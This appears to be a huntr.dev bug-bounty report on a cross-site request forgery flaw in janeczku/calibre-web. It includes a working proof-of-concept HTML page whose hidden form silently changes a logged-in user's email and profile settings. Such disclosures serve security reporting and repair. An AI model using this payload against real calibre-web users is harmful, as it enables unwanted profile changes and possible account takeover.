Lucene search
Ibarrionuevo4C5A7F26-0BCA-4473-940A-B703B399CD33HistoryJul 23, 2021 - 3:04 p.m.
Cross-Site Request Forgery (CSRF) in janeczku/calibre-web
2021-07-2315:04:58
ibarrionuevo
www.huntr.dev
2
csrf
janeczku/calibre-web
user profile
security vulnerability
attacker
poc file
impact
bugbounty
✍️ Description
An attacker can make a user change his profile settings by CSRF vulnerability through PoC file.
There is no CSRF token.
🕵️♂️ Proof of Concept
For example, changing the email address from “[email protected]” to “[email protected]” (test1’s profile).
Make the user open a link with this page poc.html:
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8083/me" method="POST">
<input type="hidden" name="email" value="test1@test.comm" />
<input type="hidden" name="kindle_mail" value="" />
<input type="hidden" name="locale" value="en" />
<input type="hidden" name="default_language" value="all" />
<input type="hidden" name="show_16" value="on" />
<input type="hidden" name="show_65536" value="on" />
<input type="hidden" name="show_128" value="on" />
<input type="hidden" name="show_256" value="on" />
<input type="hidden" name="show_32" value="on" />
<input type="hidden" name="show_8" value="on" />
<input type="hidden" name="show_4" value="on" />
<input type="hidden" name="show_64" value="on" />
<input type="hidden" name="show_4096" value="on" />
<input type="hidden" name="show_2" value="on" />
<input type="hidden" name="show_8192" value="on" />
<input type="hidden" name="show_16384" value="on" />
<input type="hidden" name="show_32768" value="on" />
<input type="hidden" name="show_131072" value="on" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
This vulnerability is capable of allow unwanted actions and changes in the profile of a user who didn’t notice the hidden intention.